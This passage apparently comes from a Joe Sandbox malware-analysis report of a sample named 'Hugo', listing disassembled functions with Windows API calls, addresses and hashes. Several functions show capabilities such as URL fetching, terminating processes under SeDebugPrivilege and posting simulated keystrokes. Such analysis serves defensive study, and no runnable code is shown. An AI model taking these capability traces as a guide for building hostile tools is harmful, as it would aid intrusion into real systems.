ScreenToClient.USER32(?,?), ref: 00F175F6
GetClientRect.USER32(?,?), ref: 00F1773A
GetWindowRect.USER32(?,?), ref: 00F1775B

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 27a4e401b156a42e0f5776af9b25a4dd81d40c9d98bbfaa006440da117600785
Instruction ID: e6292debfe64454231d6d2cb5cb5a520fcf04f0c822c3ec003dc64778ffd38f7
Opcode Fuzzy Hash: 27a4e401b156a42e0f5776af9b25a4dd81d40c9d98bbfaa006440da117600785
Instruction Fuzzy Hash: 7FC15B7990475ADBDB10DFA8C540BEDB7B1FF18310F14841AE8A9E3250DB34A985EB60

Function 00F4D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00F4D237
_free.LIBCMT ref: 00F4D2A2
_free.LIBCMT ref: 00F4D2C8
_free.LIBCMT ref: 00F4D2F1
_free.LIBCMT ref: 00F4D329
_free.LIBCMT ref: 00F4D35A
_free.LIBCMT ref: 00F4D39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00F4D41C
_free.LIBCMT ref: 00F4D435

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: b9b54c10fe40b3d9fbed2c82841d483f190c61b625af51a4598463e42e8a3804
Instruction ID: dae2ddfa63faea88424f4f8a10524f62a0dd60fd648039964ca9537f06944fad
Opcode Fuzzy Hash: b9b54c10fe40b3d9fbed2c82841d483f190c61b625af51a4598463e42e8a3804
Instruction Fuzzy Hash: 4C610471E05304AFDB26AF75DC816AE7FA4AF02330F04017DFD44AB285E6759940B791

Function 00FA5B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00FA5C24
ShowWindow.USER32(?,00000000), ref: 00FA5C65
ShowWindow.USER32(?,00000005,?,00000000), ref: 00FA5C6B
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00FA5C6F

Part of subcall function 00FA79F2: DeleteObject.GDI32(00000000), ref: 00FA7A1E

GetWindowLongW.USER32(?,000000F0), ref: 00FA5CAB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FA5CB8
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00FA5CEB
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00FA5D25
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00FA5D34

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 0b716191cb361848abad38629514f4c2fb8b1554890a7988fa2a8b56c995248b
Instruction ID: c375c580fa7166568161770df92bf8c81c2cb1660995011bf03e78452ab87ba0
Opcode Fuzzy Hash: 0b716191cb361848abad38629514f4c2fb8b1554890a7988fa2a8b56c995248b
Instruction Fuzzy Hash: C551BEB1A40A09BFEF249F24CC49FD83B65BB06B71F144111FA259A1E1C775E984FB60

Function 00F113A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00F528D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00F528EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F528FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00F52912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F52933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F111F5,00000000,00000000,00000000,000000FF,00000000), ref: 00F52942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F5295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F111F5,00000000,00000000,00000000,000000FF,00000000), ref: 00F5296E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 06318dac3c15b3043e3420301eee69741c920c85407f600d415cb80f180d37fc
Instruction ID: fca02e4d7d3f387e20f04fd6bde1ab8bbf6cc8a81a96e9c85954bdcbe2ef5955
Opcode Fuzzy Hash: 06318dac3c15b3043e3420301eee69741c920c85407f600d415cb80f180d37fc
Instruction Fuzzy Hash: 2B51AB71A00209AFDB24CF24CC85FAA7BB5FF4A761F104619FA52976A0D770E990FB50

Function 00F8CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F8CBC7
GetLastError.KERNEL32 ref: 00F8CBDA
SetEvent.KERNEL32(?), ref: 00F8CBEE

Part of subcall function 00F8CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F8CCB7
Part of subcall function 00F8CC98: GetLastError.KERNEL32 ref: 00F8CD67
Part of subcall function 00F8CC98: SetEvent.KERNEL32(?), ref: 00F8CD7B
Part of subcall function 00F8CC98: InternetCloseHandle.WININET(00000000), ref: 00F8CD86

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 327dade78972a4649277659c9ad4317b9815dac0c94c47a89d71112bb4df8b91
Instruction ID: 2e309f42bdbcb958ead35f47f32959cf707c25a38fbee828b35b7f5c44602216
Opcode Fuzzy Hash: 327dade78972a4649277659c9ad4317b9815dac0c94c47a89d71112bb4df8b91
Instruction Fuzzy Hash: DF316DB1600745AFDB21AF71CD44AA6BBF8FF46314B04451DF85A82A10C731D814FBA0

Function 00F72EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F743AD
Part of subcall function 00F74393: GetCurrentThreadId.KERNEL32 ref: 00F743B4
Part of subcall function 00F74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F72F00), ref: 00F743BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 00F72F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F72F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00F72F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 00F72F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F72F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00F72F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 00F72F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F72F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00F72F74

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: f3de2a7055da163301e4724e06a42b1c0d7ccc673ddaee13b2393779ed4f06a0
Instruction ID: f03e41a22526070c39a883437ce581a1bea8531895e7b062599001099d918384
Opcode Fuzzy Hash: f3de2a7055da163301e4724e06a42b1c0d7ccc673ddaee13b2393779ed4f06a0
Instruction Fuzzy Hash: 9801D8717842147BFB1067689C8AF593F6ADB4EB15F100012F31DAE1E0C9E56445AEAA

Function 00F72150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00F71D95,?,?,00000000), ref: 00F72159
HeapAlloc.KERNEL32(00000000,?,00F71D95,?,?,00000000), ref: 00F72160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F71D95,?,?,00000000), ref: 00F72175
GetCurrentProcess.KERNEL32(?,00000000,?,00F71D95,?,?,00000000), ref: 00F7217D
DuplicateHandle.KERNEL32(00000000,?,00F71D95,?,?,00000000), ref: 00F72180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F71D95,?,?,00000000), ref: 00F72190
GetCurrentProcess.KERNEL32(00F71D95,00000000,?,00F71D95,?,?,00000000), ref: 00F72198
DuplicateHandle.KERNEL32(00000000,?,00F71D95,?,?,00000000), ref: 00F7219B
CreateThread.KERNEL32(00000000,00000000,00F721C1,00000000,00000000,00000000), ref: 00F721B5

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: fc81f8cb3a5d46380c46699f68fb914a38ddd572cf079c032a7e9a71dfd6aae7
Instruction ID: 126d935564ae66d110f70ddf2e5abc5cf272bd01a28ce115125acf2ce02a2151
Opcode Fuzzy Hash: fc81f8cb3a5d46380c46699f68fb914a38ddd572cf079c032a7e9a71dfd6aae7
Instruction Fuzzy Hash: 4301BBB5240308BFEB10AFA5DC4DF6B7BACEB89711F418411FA05DB5A1DA709800DB21

Function 00F9AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00F7DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00F7DDAC
Part of subcall function 00F7DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00F7DDBA
Part of subcall function 00F7DD87: CloseHandle.KERNEL32(00000000), ref: 00F7DE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F9ABCA
GetLastError.KERNEL32 ref: 00F9ABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F9AC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 00F9ACC5
GetLastError.KERNEL32(00000000), ref: 00F9ACD0
CloseHandle.KERNEL32(00000000), ref: 00F9AD21

Strings

SeDebugPrivilege, xrefs: 00F9ABEC

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: c04cff142850f42a26b864d036721ece7da9b01a8081f94738b203239a1d4bef
Instruction ID: 2d536bf9ee124448c37b7da2ee6571c35c197eedc06c6f83a55f7faf4a3950c8
Opcode Fuzzy Hash: c04cff142850f42a26b864d036721ece7da9b01a8081f94738b203239a1d4bef
Instruction Fuzzy Hash: 67619E706082419FEB10DF14C894F25BBE1AF84318F54849CE86A4FBA2C775EC85DBD2

Function 00FA4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00FA43C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00FA43D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00FA43F0
_wcslen.LIBCMT ref: 00FA4435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00FA4462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00FA4490

Strings

SysListView32, xrefs: 00FA4393

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: bcdb94ae49abf85b48fecaaccdf22a4e9631029c48a7bf207d5b0580bc33e0ff
Instruction ID: a0d37a0ed80108d451c19354c95bf88357595dcae35a2502b12e90d93428e8ad
Opcode Fuzzy Hash: bcdb94ae49abf85b48fecaaccdf22a4e9631029c48a7bf207d5b0580bc33e0ff
Instruction Fuzzy Hash: 5541C3B1D00309ABDF21DF64CC45BEA7BA9FF49360F100126F954E7291D7B4A980EB90

Function 00F7C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F7C6C4
IsMenu.USER32(00000000), ref: 00F7C6E4
CreatePopupMenu.USER32 ref: 00F7C71A
GetMenuItemCount.USER32(01764908), ref: 00F7C76B
InsertMenuItemW.USER32(01764908,?,00000001,00000030), ref: 00F7C793

Strings

2, xrefs: 00F7C6FE
0, xrefs: 00F7C66F

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 9d97857dfdca74a4c15895c5d9072f7b36f47f43f5800e75ddf0d439abf4057e
Instruction ID: fa8f42bcdbbf2938d570ff032d341770595d3ae4f5c0f80444a9ace2b631da23
Opcode Fuzzy Hash: 9d97857dfdca74a4c15895c5d9072f7b36f47f43f5800e75ddf0d439abf4057e
Instruction Fuzzy Hash: 9F519070A002059BDF18CF68D884BAEBBF5AF45324F24C11FE91997291DB709942EF92

Function 00F7D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00F7D1BE

Strings

blank, xrefs: 00F7D140
warning, xrefs: 00F7D1A7
stop, xrefs: 00F7D18F
question, xrefs: 00F7D177
info, xrefs: 00F7D15F

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 82ae20b496ecb5283ac2b579096cd17ede92a54dcb85c530b7ed0d7eeb7ec5ed
Instruction ID: c8fc9a0830009da0058d7e9d410c66265f8a8e71b6309b48321f84852809102e
Opcode Fuzzy Hash: 82ae20b496ecb5283ac2b579096cd17ede92a54dcb85c530b7ed0d7eeb7ec5ed
Instruction Fuzzy Hash: B611B73664C306BAF7055B54DC82DAA77BC9F15770FE4402BF909EA281E7F4BA407262

Function 00F7E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00F7E759
gethostname.WSOCK32(?,00000100), ref: 00F7E773
gethostbyname.WSOCK32(?), ref: 00F7E780
inet_ntoa.WSOCK32(?), ref: 00F7E7C2
_strcat.LIBCMT ref: 00F7E7D0
WSACleanup.WSOCK32 ref: 00F7E7F5

Strings

0.0.0.0, xrefs: 00F7E79E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: a5bb458558d55424202c0c09717ebb2a349f37fb30ab21d8ffea9d5be5ab09ec
Instruction ID: fb00e73b5837a25f96adb0d8d1f99f9ac85f152925ee6df6da68765ea06aa817
Opcode Fuzzy Hash: a5bb458558d55424202c0c09717ebb2a349f37fb30ab21d8ffea9d5be5ab09ec
Instruction Fuzzy Hash: C611DA719001197BCB247764DC4AEDE776CEF05730F0040A7F55AA6091EF789A82F761

Function 00F7F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00F7F641
_wcslen.LIBCMT ref: 00F7F652
_wcslen.LIBCMT ref: 00F7F690
_wcslen.LIBCMT ref: 00F7F6C6
_wcslen.LIBCMT ref: 00F7F6F6
_wcslen.LIBCMT ref: 00F7F706
_wcslen.LIBCMT ref: 00F7F742
_wcslen.LIBCMT ref: 00F7F771

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 8c7c319e6eb0175bc011ade1e7727a991b8cea288c893d4ee15d56640557b6a3
Instruction ID: 49942b32d890b82560a59cde5125ee7bb1cf6e89a97efa0f31e4471813e41bb3
Opcode Fuzzy Hash: 8c7c319e6eb0175bc011ade1e7727a991b8cea288c893d4ee15d56640557b6a3
Instruction Fuzzy Hash: 0C419165D11218B5CB11EBB8CC8BACFB7A8AF05360F508466E518E3121FA38E255D3A6

Function 00F2FBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F539E2,00000004,00000000,00000000), ref: 00F2FC41
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00F539E2,00000004,00000000,00000000), ref: 00F6FC15
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F539E2,00000004,00000000,00000000), ref: 00F6FC98

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 2db9b6b43bf793f44b77caa6c882adf2ad4d4158bc447a6f9327a8f336361af1
Instruction ID: e64ff4fbcffce79ff5eb19deba00e9e2d193c48132b4dd6cc537283446356f28
Opcode Fuzzy Hash: 2db9b6b43bf793f44b77caa6c882adf2ad4d4158bc447a6f9327a8f336361af1
Instruction Fuzzy Hash: 69415B31A5839C9EC7398B38F998B393BB5AB47320F14453CE94756A60C635AA4CF711

Function 00FA379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00FA37B7
GetDC.USER32(00000000), ref: 00FA37BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FA37CA
ReleaseDC.USER32(00000000,00000000), ref: 00FA37D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00FA3812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00FA3823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00FA6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00FA385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00FA387D

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 29b5d5af8bbaf6ce944f7c3bb39eac0c8669f83d281db5b8fb2257b073989b21
Instruction ID: 6305c56b907101f5a25a3fe9783856163da31a8d2fe06fd092778b0a440e7435
Opcode Fuzzy Hash: 29b5d5af8bbaf6ce944f7c3bb39eac0c8669f83d281db5b8fb2257b073989b21
Instruction Fuzzy Hash: E731A2B21012147FEB154F50CC49FEB3BADEF4A761F044065FE099A291C6B59C41D7A0

Function 00F95A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00F95A64
NULL Pointer assignment, xrefs: 00F95A8B, 00F95DE0

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
